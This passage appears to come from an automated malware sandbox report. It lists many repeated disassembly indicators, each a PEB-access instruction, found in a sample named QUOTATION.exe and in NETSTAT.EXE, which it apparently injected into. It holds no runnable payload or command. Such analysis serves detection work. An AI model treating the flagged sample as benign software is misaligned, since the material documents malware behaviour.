          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0105A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01013D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01083D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01088DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01008E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01018EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
